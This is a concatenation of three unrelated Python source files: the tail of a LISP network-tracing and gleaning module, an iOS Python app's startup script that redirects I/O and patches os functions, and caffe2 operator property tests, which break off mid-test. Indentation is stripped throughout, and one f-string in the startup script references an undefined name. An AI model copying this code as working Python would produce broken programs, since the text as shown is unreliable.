entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts and recent-hops.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swampping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mapping array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, rloc):
if (lisp_glean_mappings == []): return(False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"])
#endfor
return(False, False)
#enddef
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache.
#
def lisp_glean_map_cache(eid, rloc, encap_port):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
if (cached_rloc.rloc.is_exact_match(rloc) and
cached_rloc.translated_port == encap_port): return
e = green(eid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Gleaned EID {} RLOC changed to {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(eid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(eid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Adding RLOC to new map-cache entry or updating RLOC for existing entry..
#
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#enddef
#------------------------------------------------------------------------------
|
Startup.py
|
try:
import sys
import os
import zipfile
zippedLib = os.environ["ZIPPEDLIB"]
destDir = os.path.expanduser("~/Library/python38")
if not os.path.isdir(destDir):
with zipfile.ZipFile(zippedLib, "r") as zip_ref:
zip_ref.extractall(destDir)
sys.path.insert(-1, os.path.expanduser("~/Documents"))
sys.path.insert(-1, os.path.expanduser("~/Documents/site-packages"))
try:
os.remove(destDir+"/turtle.py")
except:
pass
try:
os.remove(destDir+"/pydoc.py")
except:
pass
try:
os.remove(destDir+"/pdb.py")
except:
pass
import io
import console
import code
import pyto
from importlib.machinery import SourceFileLoader
import importlib
import threading
from time import sleep
from outputredirector import Reader
from extensionsimporter import *
import warnings
import logging
from _ios_getpass import getpass as _ios_getpass
import getpass
import webbrowser
import sharing
import _signal
import traceback
import unittest
from pip import BUNDLED_MODULES
from ctypes import CDLL
# MARK: - Warnings
logging.basicConfig(level=logging.INFO)
def __send_warnings_to_log__(message, category, filename, lineno, file=None, line=None):
import platform
if platform.uname()[4] == "x86_64":
return
try:
warnings
except:
import warnings
try:
pyto
except:
import pyto
_message = warnings.formatwarning(message, category, filename, lineno, line)
try:
pyto.PyOutputHelper.printWarning(_message, script=threading.current_thread().script_path)
except AttributeError:
pyto.PyOutputHelper.printWarning(_message, script=None)
return
warnings.showwarning = __send_warnings_to_log__
warnings.filterwarnings("default")
# MARK: - Allow / Disallow subprocesses
os.allows_subprocesses = (not sys.platform == "ios")
# MARK: - Input
def askForInput(prompt=None):
try:
threading
except NameError:
import threading
try:
console
except NameError:
import console
if (threading.currentThread() in console.ignoredThreads):
return ""
else:
return console.input(prompt)
__builtins__.input = askForInput
getpass.getpass = _ios_getpass
# MARK: - Output
def read(text):
try:
console
except NameError:
import console
console.print(text, end="")
def write(txt):
try:
os
except NameError:
import os
try:
threading
except NameError:
import threading
if ("widget" not in os.environ) and (threading.currentThread() in console.ignoredThreads):
return
if txt.__class__ is str:
read(txt)
elif txt.__class__ is bytes:
text = txt.decode()
write(text)
standardOutput = Reader(read)
standardOutput._buffer = io.BufferedWriter(standardOutput)
standardOutput.buffer.write = write
standardError = Reader(read)
standardError._buffer = io.BufferedWriter(standardError)
standardError.buffer.write = write
sys.stdout = standardOutput
sys.stderr = standardError
# MARK: - Web browser
class MobileSafari(webbrowser.BaseBrowser):
'''
Mobile Safari web browser.
'''
def open(self, url, new=0, autoraise=True):
sharing.open_url(url)
return True
webbrowser.register("mobile-safari", None, MobileSafari("MobileSafari.app"))
# MARK: - Modules
sys.meta_path.insert(0, DownloadableImporter())
sys.meta_path.insert(1, FrameworksImporter())
# MARK: - Pre-import modules
def importModules():
try:
import PIL.ImageShow
def show_image(image, title=None, **options):
import os
import tempfile
import sharing
imgPath = tempfile.gettempdir()+"/image.png"
i = 1
while os.path.isfile(imgPath):
i += 1
imgPath = os.path.join(tempfile.gettempdir(), 'image '+str(i)+'.png')
image.save(imgPath, "PNG")
if title == "OpenCV":
sharing.quick_look(imgPath, remove_previous=True)
else:
sharing.quick_look(imgPath)
PIL.ImageShow.show = show_image
except:
pass
importModules()
def addOnDemandPaths():
paths = pyto.Python.shared.accessibleOnDemandPaths
for path in paths:
sys.path.append(str(path))
threading.Thread(target=addOnDemandPaths).start()
# MARK: - Deprecations
__builtins__.deprecated = []
# MARK: - Pip bundled modules
# Add modules to `bundled`. I add it one by one because for some reason setting directly an array fails **sometimes**. Seems like something new in iOS 13.5 but I'm not sure.
for module in BUNDLED_MODULES:
pyto.PipViewController.addBundledModule(module)
# MARK: - OS
def fork():
pass
def waitpid(pid, options):
return (-1, 0)
if os.system("ls") != 0: # App is sandboxed
os.fork = fork
os.waitpid = waitpid
os._exit = sys.exit
else: # Not sanboxed
_system = os.system
def system(cmd):
res = _system(cmd+(f" >>{out.txt} 2>&1"))
try:
f = open("out.txt", "r")
sys.stdout.write(f.read())
f.close()
_system("rm out.txt")
except FileNotFoundError:
pass
return res
os.system = system
# MARK: - Handle signal called outside main thread
old_signal = _signal.signal
def signal(signal, handler):
try:
threading
except NameError:
import threading
if threading.main_thread() == threading.current_thread():
return old_signal(signal, handler)
else:
return None
_signal.signal = signal
# MARK: - Plugin
__builtins__.__editor_delegate__ = None
# MARK: - Unittest
_original_unittest_main = unittest.main
def _unittest_main(module='__main__', defaultTest=None, argv=None, testRunner=None, testLoader=unittest.defaultTestLoader, exit=True, verbosity=1, failfast=None, catchbreak=None, buffer=None, warnings=None):
_module = module
if module == "__main__":
thread = threading.current_thread()
try:
path = thread.script_path
_module = path.split("/")[-1]
_module = os.path.splitext(_module)[0]
except AttributeError:
pass
_original_unittest_main(_module, defaultTest, argv, testRunner, testLoader, exit, verbosity, failfast, catchbreak, buffer, warnings)
unittest.main = _unittest_main
# MARK: - Run script
def run():
CDLL(None).putenv(b"IS_PYTHON_RUNNING=1")
SourceFileLoader("main", "%@").load_module()
threading.Thread(target=run).start()
threading.Event().wait()
except Exception as e:
import traceback
from ctypes import CDLL
s = traceback.format_exc()
CDLL(None).logToNSLog(s.encode())
CDLL(None).logToNSLog(str(e).encode())
|
hypothesis_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import copy
import time
from functools import partial, reduce
from future.utils import viewitems, viewkeys
from hypothesis import assume, given, settings, HealthCheck
import hypothesis.strategies as st
import unittest
import os
from caffe2.python import core, workspace, tt_core, dyndep
import caffe2.python.hypothesis_test_util as hu
from caffe2.proto import caffe2_pb2
dyndep.InitOpsLibrary('@/caffe2/caffe2/fb/optimizers:sgd_simd_ops')
def sigmoid(x):
return 1.0 / (1.0 + np.exp(-x))
@st.composite
def _tensor_and_prefix(draw, dtype, elements, min_dim=1, max_dim=4, **kwargs):
dims_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
extra_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
assume(len(dims_) + len(extra_) < max_dim)
return (draw(hu.arrays(dims_ + extra_, dtype, elements)),
draw(hu.arrays(extra_, dtype, elements)))
def _tensor_and_indices(min_dim=1, max_dim=4, dtype=np.float32,
elements=None, **kwargs):
""" generates a tensor and a list of indices of larger tensor of same dim"""
data_dims_ = st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim)
original_dim = st.integers(min_value=2, max_value=10)
return st.tuples(data_dims_, original_dim).flatmap(lambda pair: st.tuples(
st.just(pair[1]), # original dimension
hu.arrays(pair[0], dtype, elements), # data tensor
hu.arrays(pair[0][0], dtype=np.int64, elements=st.integers(
min_value=0, max_value=pair[1] - 1)),
))
_NUMPY_TYPE_TO_ENUM = {
np.float32: core.DataType.FLOAT,
np.int32: core.DataType.INT32,
np.bool: core.DataType.BOOL,
np.uint8: core.DataType.UINT8,
np.int8: core.DataType.INT8,
np.uint16: core.DataType.UINT16,
np.int16: core.DataType.INT16,
np.int64: core.DataType.INT64,
np.float64: core.DataType.DOUBLE,
}
def _dtypes(dtypes=None):
dtypes = dtypes if dtypes else [np.int32, np.int64, np.float32]
return st.sampled_from(dtypes)
def _test_binary(name, ref, filter_=None, gcs=hu.gcs,
test_gradient=False, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(
lambda dtype: hu.tensors(
n=2, dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
out=st.sampled_from(('Y', 'X1', 'X2') if allow_inplace else ('Y',)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary(self, inputs, out, gc, dc):
op = core.CreateOperator(name, ["X1", "X2"], [out])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
# We only do gradient check with float32 types.
if test_gradient and X1.dtype == np.float32:
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
return test_binary
def _test_binary_broadcast(name, ref, filter_=None,
gcs=hu.gcs, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(lambda dtype: _tensor_and_prefix(
dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
in_place=(st.booleans() if allow_inplace else st.just(False)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary_broadcast(self, inputs, in_place, gc, dc):
op = core.CreateOperator(
name, ["X1", "X2"], ["X1" if in_place else "Y"], broadcast=1)
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
def cast_ref(x, y):
return (np.array(ref(x, y)[0], dtype=x.dtype), )
# gradient not implemented yet
# self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], cast_ref)
return test_binary_broadcast
class TestOperators(hu.HypothesisTestCase):
def test_comparison_ops(self):
ops = {"LT": lambda x1, x2: [x1 < x2],
"LE": lambda x1, x2: [x1 <= x2],
"GT": lambda x1, x2: [x1 > x2],
"GE": lambda x1, x2: [x1 >= x2]}
for name, ref in viewitems(ops):
_test_binary(name, ref, gcs=hu.gcs_cpu_only)(self)
_test_binary_broadcast(name, ref, gcs=hu.gcs_cpu_only)(self)
@given(inputs=hu.tensors(n=2), in_place=st.booleans(), **hu.gcs)
def test_sum(self, inputs, in_place, gc, dc):
op = core.CreateOperator("Sum", ["X1", "X2"],
["Y" if not in_place else "X1"])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_row_mul(self, inputs, gc, dc):
op = core.CreateOperator("RowMul", ["X1", "X2"], ["Y"])
X1, Xtmp = inputs
X2 = Xtmp[:, 0]
def ref(x, y):
ret = np.zeros(shape=x.shape, dtype=x.dtype)
for i in range(y.size):
ret[i, ] = x[i, ] * y[i]
return [ret]
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
@given(inputs=hu.tensors(n=2), **hu.gcs_cpu_only)
def test_max(self, inputs, gc, dc):
op = core.CreateOperator("Max", ["X1", "X2"], ["Y"])
X1, X2 = inputs
# Make X1 and X2 far from each other, since X1=X2 is not differentiable
# and the step size of gradient checker is 0.05
X1[np.logical_and(X1 >= X2 - 0.05, X1 <= X2)] -= 0.05
X1[np.logical_and(X1 <= X2 + 0.05, X1 >= X2)] += 0.05
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
def elementwise_max(X, Y):
return [np.maximum(X, Y)]
self.assertReferenceChecks(gc, op, [X1, X2], elementwise_max)
def test_add(self):
def not_overflow(x):
if not isinstance(x, float):
return abs(x) < (1 << 30) - 1
return True
def ref(x, y):
return (x + y, )
_test_binary("Add", ref, filter_=not_overflow, test_gradient=True)(self)
_test_binary_broadcast("Add", ref, filter_=not_overflow)(self)
def test_sub(self):
def ref(x, y):
return (x - y, )
# TODO(jiayq): enable gradient test when implemented.
_test_binary("Sub", ref, test_gradient=True)(self)
_test_binary_broadcast("Sub", ref)(self)
def test_mul(self):
def not_overflow(x):
if not isinstance(x, float):
return abs(x) < (1 << 15) - 1
return True
def ref(x, y):
return (x * y, )
_test_binary("Mul", ref, filter_=not_overflow, test_gradient=True)(self)
_test_binary_broadcast("Mul", ref, filter_=not_overflow)(self)
def test_div(self):
def ref(x, y):
return (x / y, )
def non_zero(x):
return abs(x) > 1e-2
def div_dtypes():
return st.sampled_from([np.float32, np.float64])
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=True,
dtypes=div_dtypes, gcs=hu.gcs_cpu_only
)(self)
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=False,
dtypes=div_dtypes
)(self)
_test_binary_broadcast(
"Div", ref, filter_=non_zero, dtypes=div_dtypes)(self)
@given(X=hu.tensor(), in_place=st.booleans(), **hu.gcs)
def test_negative(self, X, in_place, gc, dc):
op = core.CreateOperator("Negative", ["X"],
["Y" if not in_place else "X"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_tanh(self, X, gc, dc):
op = core.CreateOperator("Tanh", "X", "Y")
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_averaged_loss(self, X, gc, dc):
op = core.CreateOperator("AveragedLoss", ["X"], ["loss"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), inplace=st.booleans(), **hu.gcs)
def test_softsign(self, X, inplace, gc, dc):
op = core.CreateOperator("Softsign", ["X"], ["X" if inplace else "Y"])
def softsign(X):
return (X / (1 + np.abs(X)),)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertReferenceChecks(gc, op, [X], softsign)
if inplace:
with self.assertRaises(Exception):
self.assertGradientChecks(gc, op, [X], 0, [0])
else:
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(
device_options=st.lists(
min_size=2,
max_size=4,
elements=st.sampled_from(hu.expanded_device_options)),
set_seed=st.booleans())
def test_random_seed_behaviour(self, device_options, set_seed):
# Assume we are always operating on CUDA or CPU, since RNG is
# inconsistent between CPU and GPU.
device_options = copy.deepcopy(device_options)
assume(len({do.device_type for do in device_options}) == 1)
if set_seed:
for do in device_options:
do.random_seed = 1000
def run(do):
# Reset each time because 'Y' may already exist in the workspace
# on a different device
workspace.ResetWorkspace()
ws = workspace.C.Workspace()
op = core.CreateOperator(
"XavierFill", [], ["Y"],
device_option=do,
shape=[2])
ws.run(op)
return ws.blobs["Y"].fetch()
ys = [run(do) for do in device_options]
for y in ys[1:]:
if set_seed:
np.testing.assert_array_equal(ys[0], y)
else:
with self.assertRaises(AssertionError):
np.testing.assert_array_equal(ys[0], y)
@given(axis=st.integers(min_value=1, max_value=4),
num_output=st.integers(min_value=4, max_value=8),
engine=st.sampled_from(["", "PACKED"]),
**hu.gcs)
def test_fully_connected_axis(self, axis, num_output, engine, gc, dc):
np.random.seed(1)
X = np.random.randn(1, 2, 3, 2, 1).astype(np.float32)
def prod(xs):
p = 1
for x in xs:
p *= x
return p
K = prod(list(X.shape)[axis:])
N = num_output
W = np.random.randn(N, K).astype(np.float32)
b = np.random.randn(N).astype(np.float32)
op = core.CreateOperator(
"FC",
["X", "W", "b"],
["Y"],
engine=engine,
axis=axis)
for name, param in [("X", X), ("W", W), ("b", b)]:
self.ws.create_blob(name).feed(param)
self.ws.run(op)
Y = self.ws.blobs["Y"].fetch()
self.assertEqual(list(Y.shape), list(X.shape)[:axis] + [N])
inputs = [X, W, b]
self.assertDeviceChecks(dc, op, inputs, [0])
for param, _ in enumerate(inputs):
self.assertGradientChecks(gc, op, inputs, param, [0])
@unittest.skipIf(not workspace.has_gpu_support,
"Skipping test due to no gpu present.")
@given(hidden_size=st.integers(min_value=1, max_value=3),
num_layers=st.integers(min_value=1, max_value=3),
bidirectional=st.booleans(),
rnn_mode=st.sampled_from(["lstm"]), # TODO: "gru"
input_mode=st.sampled_from(["linear"]),
dropout=st.floats(min_value=1.0, max_value=1.0),
T=st.integers(min_value=2, max_value=6),
N=st.integers(min_value=1, max_value=4),
D=st.integers(min_value=1, max_value=4))
def test_recurrent(self, hidden_size, num_layers, bidirectional, rnn_mode,
input_mode, dropout, T, N, D):
#there's a bug in miopen for N=1 which would be resolved in the next release.
if workspace.has_hip_support:
assume(N>1)
# Random seed, this one happens to pass
seed = 1234
np.random.seed(seed)
# set device option
if workspace.has_hip_support:
device_option = hu.hip_do
engine = 'MIOPEN'
else:
device_option = hu.gpu_do
engine = 'CUDNN'
input_weight_size = hidden_size * D
upper_layer_input_weight_size = hidden_size * hidden_size
if bidirectional:
upper_layer_input_weight_size *= 2
recurrent_weight_size = hidden_size * hidden_size
input_bias_size = hidden_size
recurrent_bias_size = hidden_size
num_directions = 2 if bidirectional else 1
first_layer_sz = input_weight_size + recurrent_weight_size + \
input_bias_size + recurrent_bias_size
upper_layer_sz = upper_layer_input_weight_size + \
recurrent_weight_size + input_bias_size + \
recurrent_bias_size
total_sz = 4 * (first_layer_sz + (num_layers - 1) * upper_layer_sz)
total_sz *= num_directions
W = np.random.rand(total_sz).astype(np.float32)
self.ws.create_blob("WEIGHT").feed(W, device_option=device_option)
op = core.CreateOperator(
"Recurrent",
["INPUT", "HIDDEN_INPUT", "CELL_INPUT", "WEIGHT"],
["OUTPUT", "HIDDEN_OUTPUT", "CELL_OUTPUT",
"RNN_SCRATCH", "DROPOUT_STATES"],
hidden_size=hidden_size,
bidirectional=bidirectional,
rnn_mode=rnn_mode,
dropout=dropout,
input_mode=input_mode,
num_layers=num_layers,
seed=seed,
engine=engine)
X = np.random.randn(T, N, D).astype(np.float32)
self.ws.create_blob("INPUT").feed(X, device_option=device_option)
W = self.ws.blobs["WEIGHT"].fetch()
H = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32)
C = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32) if rnn_mode == "lstm" else \
np.empty((1,)).astype(np.float32) # unused in GRU
inputs = [X, H, C, W]
input_idxs = [i for (i, _) in enumerate(inputs)] \
if rnn_mode == "lstm" else [0, 1, 3] # ignore C
for input_idx in input_idxs:
self.assertGradientChecks(
device_option, op, inputs, input_idx, [0],
stepsize=0.01, threshold=0.01)
@given(ndim=st.integers(1, 4),
axis=st.integers(0, 3),
add_axis=st.integers(0, 1),
num_inputs=st.integers(2, 4), **hu.gcs)
def test_depth_concat(self, ndim, axis, add_axis, num_inputs, gc, dc):
assume(axis < ndim)
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7][:ndim]
individual_dims = [1, 2, 3, 4, 5][:num_inputs]
inputs = []
for i in range(num_inputs):
if add_axis == 0:
# Sets a unique dim and create the input.
shape[axis] = individual_dims[i]
inputs.append(np.random.randn(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
axis=axis, add_axis=add_axis)
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat(*inputs):
inputs = list(inputs)
if add_axis:
for i in range(len(inputs)):
inputs[i] = np.expand_dims(inputs[i], axis)
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat)
@given(num_inputs=st.integers(2, 4),
order=st.sampled_from([("NCHW", 1), ("NHWC", 3)]),
**hu.gcs)
def test_depth_concat_with_order(self, num_inputs, order, gc, dc):
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7]
individual_dims = [1, 2, 3, 4][:num_inputs]
inputs = []
for i in range(num_inputs):
# Sets a unique dim and create the input.
shape[order[1]] = individual_dims[i]
inputs.append(np.random.rand(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
order=order[0])
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat_with_order(*inputs):
inputs = list(inputs)
axis = order[1]
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat_with_order)
@given(X=hu.arrays(dims=[5, 2],
elements=st.floats(min_value=1.0, max_value=10.0)),
**hu.gcs_cpu_only)
def test_last_n_windows(self, X, gc, dc):
workspace.FeedBlob('input', X)
workspace.FeedBlob('next', np.array(0, dtype=np.int32))
workspace.CreateBlob('output')
collect_net = core.Net('collect_net')
collect_net.LastNWindowCollector(
['output', 'next', 'input'],
['output', 'next'],
num_to_collect=7,
)
plan = core.Plan('collect_data')
plan.AddStep(core.execution_step('collect_data',
[collect_net], num_iter=2))
workspace.RunPlan(plan)
output = workspace.FetchBlob('output')
inputs = workspace.FetchBlob('input')
new_output = np.zeros([7, inputs.shape[1]])
for i in range(inputs.shape[0] * 2):
new_output[i % 7] = inputs[i % inputs.shape[0]]
import numpy.testing as npt
npt.assert_almost_equal(output, new_output, decimal=5)
@given(dtype=st.sampled_from([np.float32, np.float64, np.int32, np.bool]))
def test_print(self, dtype):
data = np.random.permutation(6).astype(dtype)
self.ws.create_blob("data").feed(data)
op = core.CreateOperator("Print", "data", [])
self.ws.run(op)
@given(inputs=hu.tensors(n=2),
in_place=st.booleans(),
momentum=st.floats(min_value=0.1, max_value=0.9),
nesterov=st.booleans(),
lr=st.floats(min_value=0.1, max_value=0.9),
**hu.gcs)
def test_momentum_sgd(
self, inputs, in_place, momentum, nesterov, lr, gc, dc):
grad, m = inputs
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"MomentumSGD",
["grad", "m", "lr"],
["grad" if in_place else "grad_o",
"m" if in_place else "m_o"],
momentum=momentum,
nesterov=int(nesterov),
device_option=gc)
self.assertDeviceChecks(
dc, op, [grad, m, lr], [0])
# Reference
def momentum_sgd(grad, m, lr):
lr = lr[0]
if not nesterov:
adjusted_gradient = lr * grad + momentum * m
return (adjusted_gradient, adjusted_gradient)
else:
m_new = momentum * m + lr * grad
return ((1 + momentum) * m_new - momentum * m, m_new)
self.assertReferenceChecks(gc, op, [grad, m, lr], momentum_sgd)
@given(inputs=hu.tensors(n=3),
in_place=st.booleans(),
decay=st.floats(min_value=0.1, max_value=0.9),
momentum=st.floats(min_value=0.1, max_value=0.9),
lr=st.floats(min_value=0.1, max_value=0.9),
epsilon=st.floats(min_value=1e-5, max_value=1e-2),
**hu.gcs)
def test_rmsprop_sgd(self, inputs, in_place, decay, momentum, lr, epsilon,
gc, dc):
grad, ms, mom = inputs
ms = np.abs(ms) + 0.01
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"RmsProp",
["grad", "ms", "mom", "lr"],
["grad" if in_place else "grad_o",
"ms" if in_place else "ms_o",
"mom" if in_place else "mom_o"],
momentum=momentum, decay=decay, epsilon=epsilon, device_option=gc)
self.assertDeviceChecks(dc, op, [grad, ms, mom, lr], [0])
def rmsprop(grad, ms, mom, lr):
lr = lr[0]
ms_o = ms + (1. - decay) * (np.square(grad) - ms)
mom_o = momentum * mom + lr * grad / np.sqrt(epsilon + ms_o)
grad_o = mom_o
return (grad_o, ms_o, mom_o)
self.assertReferenceChecks(gc, op, [grad, ms, mom, lr], rmsprop)
# Reference
@staticmethod
def _dense_ftrl(alpha, beta, lambda1, lambda2, w, nz, g):
if isinstance(alpha, np.ndarray):
alpha = np.asscalar(alpha)
n = np.take(nz, 0, axis=-1)
z = np.take(nz, 1, axis=-1)
# python port of Sigrid's implementation
g2 = g * g
sigma = (np.sqrt(n + g2) - np.sqrt(n)) / alpha
z += g - sigma * w
n += g2
w = (np.sign(z) * lambda1 - z) / (
(beta + np.sqrt(n)) / alpha + lambda2)
w[np.abs(z) <= lambda1] = 0
return (w, np.stack([n, z], axis=-1))
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd(self, inputs, in_place, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
